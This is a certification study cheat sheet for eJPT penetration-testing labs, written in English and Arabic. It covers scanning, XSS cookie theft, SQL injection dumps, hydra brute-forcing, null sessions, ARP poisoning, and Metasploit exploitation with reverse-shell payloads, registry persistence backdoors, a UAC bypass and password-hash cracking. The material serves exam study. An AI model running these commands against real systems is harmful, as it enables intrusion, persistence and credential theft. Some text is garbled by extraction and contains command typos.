eJPT Cheat Sheet

FOOTPRINTING AND SCANNING

❖ Ping sweeping :
# Ping 192.168.43.1
# Ping website.com
❖ fping Tool :
# fping –a –g 10.54.12.0/24

❖ Nmap ping scan :

# nmap –sn 192.168.43.0/24
# nmap –sn 172.16.12.*
# nmap –sn –iL hostslist.txt

❖ OS fingerprinting with nmap:

# sudo nmap –o 192.168.43.1
# nmap –Pn –O 192.168.43.1

❖ Scannning and os fingerprinting:

1) Ping scan
# nmap –sn –n ip address
2) Syn scan
# sudo nmap –sS ip address
3) version detection scan
# sudo nmap –sv ip address
4) os fingerprinting
# sudo nmap –o ip address
NESSUS TOOL
❖ Find a target in the network
# ifconfig
# nmap –sn 192.168.99.0/24

❖ Identify The target Role

# nmap –A 192.168.99.50

❖ Scan The terget in nessus:

# New Scan -> Advanced scan

❖ Select target system

# Policy -> New Policy -> Advanced Scan
WEB APPLICATION ATTACKS
 WEB SERVER FINGERPRINTING
# web server service
# version
# system of server

❖ Fingerprinting with Netcat :

# nmap –sv website.com → for port scan

❖ Fingerprinting with OpenSSL :

# opensll s_client –connect website.com:443

❖ Fingerprinting with Httprint :

# httpprint –P0 –h ip address -s /usr/share/httprint/signatures.txt
HTTP VERBS
 HTTP methods :
# GET # POST
# HEAD # PUT
# DELETE # OPTIONS

❖ Enumeration with OPTIONS :

# nc website.com 80
OPTIONS /HTTP/1.0

❖ Exploiting DELETE verb :

# nc website.com 80
DELETE /login.php HTTP/1.0

❖ Exploiting PUT Verb :

# nc website.com 80
PUT /payload.php HTTP/1.0
Content-type: text/html
Content-length: 20

❖ for know size of file:

# wc –m payload.php
DIRECTORS AND FILES ENUMERATION
 Dirbuster Tool

❖ Find all the machines in The network :

# nmap –s 10.104.11.0/24

❖ Identify The machine Role :

# nmap –sV 10.104.11.96,198

❖ EXPLORE THE WEB APPLICATION :

❖ FIND HIDDEN FILES

❖ Let us start dirbuster and run a scan using the directory-list-
2.3.-small.txt file. After a minute or two, we should start
getting some interesting results:

❖ Here we can see that in the include folder there is a file named
config.old. Let us inspect it and see if there is anything
interesting in it:

❖ As we can see, the file contains some database credentials! If

you recall, in the previous steps we had found a machine
running MySQL. Let us try a DB connection to this machine with
the credentials just found:
❖ Unfortunately, it seems that the credentials are not working.
Let us keep investigating the files found with dirbuster. If we
check the previous screenshot, we can see that there is a
page named signup.php that we were not able to access from
the links in the web application:

❖ TEST THE CREDENTIALS FOUND

# mysql –u name –p password –h 10.104.11.198

❖ RETRIEVE THE CORRECT ADMIN PASSWORD

# show databases;
# use database name;
# show tables;

# select * from accounts

❖ With the information just obtained, let us try to log into the web application:
‫‪CROSS SITE SCRIPTING‬‬
‫❖‬ ‫‪Reflected xss :‬‬
‫‪ #‬استغاللها عن طريق رابط الموقع‬
‫>‪http://victim.site/search.php?find=<payload‬‬
‫❖‬ ‫‪Stored xss :‬‬
‫‪ #‬تتخزن في الصفحة و يتم استغاللها داخل الصفحة‬
‫‪ #‬انشاء سيرفر لتخزين الكوكيز و يتم حقن البايلود في الصفحة‬
‫المصابة ‪ ،‬عندما يزورها احد يتم سرقة الكوكيز و ارسالة على‬
‫سيرفر المهاجم‬
‫❖‬ ‫‪Find all the xss‬‬
‫‪# Reflected xss :‬‬

‫‪# Payload :‬‬

‫>‪<script>alert(‘xss’)</script‬‬

‫‪# Stored xss :‬‬

❖ STEAL THE ADMIN SESSION COOKIES

We know that the web application is vulnerable to Stored

XSS. From the description of the lab we also know that the
administrator usually visits the page every 3-4 minutes. With
this information, we can try to exploit the stored XSS in order
to steal the administrator session cookies and then
authenticate ourselves with those. We need a web page that
is able to retrieve and store those cookies. Instead of running
one on our machine, we can use the web page hosted at the
address http://192.168.99.11 (read the lab description to see
how this works). Note that we have created this page for
your convenience and that in a real situation you’d need to
have this page on your server. So let us create our payload
and see if we are able to steal some cookies. To do this we
can use a payload similar to the following

After we insert the previous payload, we just have to wait

few minutes until the admin opens the contacts page. The
script will run and steal the cookies

After we insert the previous payload, we just have to wait

few minutes until the admin opens the contacts page. The
script will run and steal the cookies
SQL INJECTION
❖ EXPLORE THE WEB APPLICATION
# In order to explore the web application we just need to type the
IP address in our browser:

❖ all the possible injection points :

# As you can see in the address bar of our browser, it seems that
the application accepts a parameter (id). This is probably used to
retrieve the news from a database. Let’s then use this injection
point for our tests!

❖ TEST AND EXPLOIT THE INJECTION POINT

# The first test we can run against the page found in the previous
step is the following:
❖ We just added a single quote in the address bar, and as shown in
the screenshot above, we obtained a mysql error. It is time to
get our hands dirty! Let us create few payloads in order to test
if the parameter is vulnerable to SQL Injections.

# We want to test it against Boolean conditions, so let us use the

following payload:

# Then let us try with the following payload (we changed the
Boolean condition from 1=1 to 1=2):

# Then let us try with the following payload (we changed the
Boolean condition from 1=1 to 1=2):
❖ DUMP THE DATA
# Then let us try with the following payload (we changed the Boolean condition
from 1=1 to 1=2):

# As we can see from the previous screenshot, sqlmap identifies the parameter
as vulnerable! Now we just have to get the structure of the database and dump
the data. First, let us get a list of tables:
❖ Then dump all the data from the accounts table with the
following command

# sqlmap -u http://10.124.211.96/newsdetails.php?id=1 -D
awd -T accounts –dump

# As we can see, we now have a list of usernames and

password to use in order to log into the web application! Let
us try one of these:

Great, we successfully logged into the web application!

SYSTEM ATTACKS
 MALWARE
‫ اي برمجيات خبيثة تسيئ استخدام النظام‬#
• Virus • Trojan Horses • Rootkit • Bootkit
• Backdoors • Adware • Spyware • Greyware
•Dialer • Key-logger • Botnet • Ransomware
• Data-Stealing Malware • Worm

❖ Intalling and blocking Malware-based Backdoor :

# installing Backdoor:
.‫عن طريق سي دي او رابط لتنزيل الملف‬

‫يتم تنزيل الملف على جهاز المستهدف‬

.‫في التاسك مانجر يوجد ملف غريب‬

❖ Before installing backdoor:
# Tool angryip , Putty
:‫تتحقق من العنوان االيبي و المنافذ المفتوحة‬

Tools → Preferences

Select Ports 1-1024,4400-4500

# output angry ip :

By PuTTY exploit the port :

# before exploit , Openning shell:

# Malware code :
❖ Blocking a Backdoor :
# Go to Task Manager

# Right click on mouse → End task

# Select start then type “Firewall with Advanced Security”

# select The Inbound Rules

# Right click on mouse → Disable Rule

# Delete File code

# Stopped the ncat process in the Task Manager console

# Deleted The ini.vbs file
# Closed The 4450 port
PASSWORD ATTACKS
❖ PASSWORD CRACKING :
# Brute Force attacks → ‫تخمين جميع باسووردات العالم‬
# Dictionary attacks → ‫تعطية الكلمات المشهوره و يمخن الهاش‬
❖ Tool:
# John The Ripper

❖ Auditing Password with a Password cracking utility :

# Run the following command the
/usr/share/wordlists/rockyou.txt.gz
‫لفك ضغط الملف و التعديل عليه‬

# vim / usr/share/wordlists/rockyou.txt
.‫للتعديل على الملف و اإلضافة علية‬

# add the password in the file

.‫تضيف الكلمات المستخرجة من االستبيان الى الملف‬

# Create text file of usernames and password hashes

.‫انشاء ملف فيه ملفات الباسوورد هاش و اليوزرات‬
❖ Run John to crack password

# John –wordlists=/usr/share/wordlists/rockyou.txt crack-this-file

NETWORK ATTACKS
 AUTHENTICATION CRACKING
# hydra tool for cracking

❖ FIND ALIVE HOSTS IN THE NETWORK :

# nmap –sn 192.168.99.0/24

❖ PORT SCAN AND SERVICE DETECTION :

# nmap –sV 192.168.99.22

❖ BRUTEFORC THE SERVICE AUTHENTICATION

# For the telnet service, let us use the following command
and see what we get:

# As we can see in the following screenshot, we are able

to find some valid username/password pairs. For our
testing purposes, they are enough, so we can stop the
bruteforce.
# Let us confirm that at least one of these two credentials works
with the following command:
Login Telnet :

# cracking For ssh service :

# As we can see in the results, Hydra found valid credentials for

the SSH service

# Once again let us verify that these credentials work on the

remote system:
❖ DOWNLOAD AND CRACK THE LOCAL PASSWORD OF THE SYSTEM
# In order to download these two files1 we can use the scp
(secure copy) command as follow:

# Now that we have these files into our local machine, we can
use john the ripper and unshadow to crack the user passwords.
First let us use unshadow to get the password hashes:

# Now that we have the password hashes stored in the file

named to_crack, we can use John the Ripper to crack them:
WINDOWS SHARE
‫ مشاركة الملفات بين األجهزة عبر الشبكة‬#

d$
c$
admin$

❖ NULL SESSION ATTACKS:

# Null session attacks can be used to enumerate a lot of
information. Attackers can steal information about:
• Passwords
• System users
• System groups
• Running system processes

❖ ENUMERATING WINDOW SHARE:

# windows Tool:
- Nbtstat
- NET VIEW
# Nbtstat command:

Null session :
❖ Exploit Null session with windows:

❖ ENUMERATING WINDOW SHARE:

# Linux Tool
- Nmblookup
- Smbclinet
# Nmblookup command
nmblookup -A 10.130.40.80

❖ Exploit Null session with Linux:

# Smbclinet comand:
smbclient -L //10.130.40.80 -N
❖ Checking for Null Sessions with Windows :
# net use \\10.130.40.80\IPC$ '' /u:’’

❖ Checking for Null Sessions with Linux :

# smbclient //10.130.40.80/IPC$ -N

❖ Exploiting Null Sessions with Enum :

# enum –S 10.130.40.80 → ‫معلومات عن الشير‬

# enum -U 10.130.40.80 → ‫تطلع اليوزرات الموجوده‬

# enum -P 10.130.40.80 → ‫يطلع الباسوورد بولسي‬

❖ NULL SESSION LAB :
❖ FIND A TARGET IN THE NETWORK:
# nmap –sn 192.168.99.0/24

❖ CHECK FOR NULL SESSION :

# emun4Linux –n 192.168.99.162
❖ GATHER INFORMATION WITH ENUM4LINUX :
# enum4linux –a 192.168.99.162

❖ USE SMBCLINET TO NAVIGATE THE TARGET MACHINE :

# First let us get the list of shares using smbclient:
# Smbclinet –L WORKGROUP –I 192.168.99.162 –N –U ””
Let us now try to access the WorkSharing share and see what files
are stored in there :
# smbclinet \\\\192.168.99.162\\worksharing –N

# smb: \> ls → ‫لمعرفة الملفات الموجودة على المسار‬

# smb: \> get congratulations.txt /root/Desktop → ‫لحفظ الملف على‬
‫سطح المكتب‬
# smb: \> exit → ‫للخروج من االداه‬
# cat \root/Desktop → ‫لقراءة الملف‬
ARP POISONING
‫ الرسائل بين االجهزه داخل الشبكة‬#
:ip forwading ‫لتفعيل خاصية‬
# echo 1 > /proc/sys/net/ipv4/ip_forward
❖ Arpspoof command:
# arpspoof -i TAP0 -t 192.168.4.11 -r 192.168.4.16
-i = interface
-t = target
-r = host
‫ التارقيت و الهوست المقصود فيهم الطرفين المراقبين‬#
❖ ARP POISONING LAB
# Identify the server and the clinet
Nmap –sS –n 10.100.13.0/24

10.100.13.37 listens on port 23, so it is the server. 10.100.13.36 is

the client.

❖ Intercept the traffic

# configure your attacking macine to forward IP packets:

# Attack the victims by poisoning their ARP cache:

# Run Wireshark and display telnet traffic only:

#Perform a “Follow TCP Stream” and extract the credentials:

❖ LOGIN TO THE TELNET SERVER :
# Use them to login into the server:
‫‪METASPLOIT / METERPRETER‬‬
‫‪# Run metasploit:‬‬
‫‪-‬‬ ‫‪Msfconsole‬‬
‫‪Command :‬‬
‫الظهار الخيارات الموجودة → ‪# Show‬‬

‫للبحث عن بايلود او استغالل → ‪#search‬‬

‫الستخدام استغالل → ‪# use‬‬

‫للرجوع للخلف او الغاء استغالل → ‪# back‬‬

‫معلومات بالتفصيل عن استغالل معين → ‪# info‬‬

# show options → ‫لفتح اعدادات االستغالل‬

# set → ‫للتعديل في االعدادات‬

❖ Configuring a Payload :
# meterpreter payload :

❖ command:
# background →‫تخلي الجلسة معلقه‬

# session –i 1 → ‫تشغيل الجلسة‬

‫يفتح لسته الجلسات → ‪# sessions –l‬‬

‫❖‬ ‫‪Meterpreter attack command :‬‬

‫معلومات عن الجهاز → ‪# sysinfo‬‬

‫معلومات عن شبكة الجهاز → ‪# ifconfig‬‬

‫معلومات عن جدول الراوتينق → ‪# Route‬‬

‫اسم اليوزر المتصل على الجهاز → ‪# getuid‬‬

‫ترقية اعلى صالحيات >‪# getsystem --‬‬

BYPASSING UAC IN METASPLOIT
# background
# search bypassing uac

# use exploit/windows/local/bypassuac
# show options

# set session 1
# exploit
‫‪# meterpreter attack command :‬‬
‫المسار الي انت فيه → ‪# pwd‬‬
‫التنقل بين المسارات → ‪# cd‬‬
‫عرض محتوى المسار → ‪# ls‬‬

‫لتنزيل ملف على جهازك → ‪# download‬‬

‫لتنزيل ملف على جهاز المستهدف → ‪# upload‬‬

‫‪# Running an OS Shell:‬‬

‫لفتح ‪# Shell → cmd‬‬
METASPLOIT LAB
❖ Find a target in the network
# nmap –sn 192.168.99.0/24 or nmap –sS 192.168.99.0/24

❖ Identify available services on the target

❖ Find a vulnerable service in metasploit

# search freeftp
❖ Configure the module and exploit the machine
# use exploit/windows/ftp/freeftpd_pass
# show options
# set ftpuser anonymous
# set rhosts 192.168.99.12 set rport 21 set payload
windows/meterpreter/reverse_tcp
# set exitfunc process
# set lhost 192.168.99.100
# set lport 4444

# Now we can start the module by typing exploit:

❖ INSTALL A BACKDOOR
# By pressing Ctrl + z inside the meterpreter prompt, we
can put it into the background and work further on the
backdoor:

# Type “sessions -l” inside the Metasploit prompt and keep

in mind the Id value:

# Now, let’s go to the persistence module, as follows:

The session should be set to the same value as obtained

above.

# use exploit/windows/local/persistence
# set reg_name backdoor
# set exe_name backdoor
# set startup SYSTEM
# set session 1
# set payload windows/meterpreter/reverse_tcp
# set exitfunc process
# set lhost 192.168.99.100
# set lport 5555
# As you can see, the backdoor has been successfully installed, but it
was just planted on the target system in the registry’s autorun area.
In order to run the backdoor, we need to perform a system reboot (a
user who switches off and on his machine would have caused the
backdoor to run eventually). Let’s go back to our meterpreter session
and spawn a shell to reboot the victim system:
# sessions -i 1
# shell
# shutdown /r /f

# When in shell, press Ctrl+Z twice to return to the main Metasploit

menu. Type “jobs -l” to see if any active listeners are running:
# It seems that we are currently unable to receive any backdoor
connection since there are no working listeners.

It seems that we are currently unable to receive any backdoor

connection since there are no working listeners.
# use exploit/multi/handler
# set lhost 192.168.99.100
# set lport 5555
# set payload windows/meterpreter/reverse_tcp
# exploit –j
❖ GET THE PASSWORD HASHES AND CRACK THEM
# hashdump
# cat pwd
# john pwd
❖ LOCATE AND DOWNLOAD THE CONGRATS.TXT FILE
# search -f congrats.txt
# download 'c:\Documents and Settings\eLSAdmin\My
Documents\Congrats.txt' /root/

# Now, we just need to open it:

# cat congrats.txt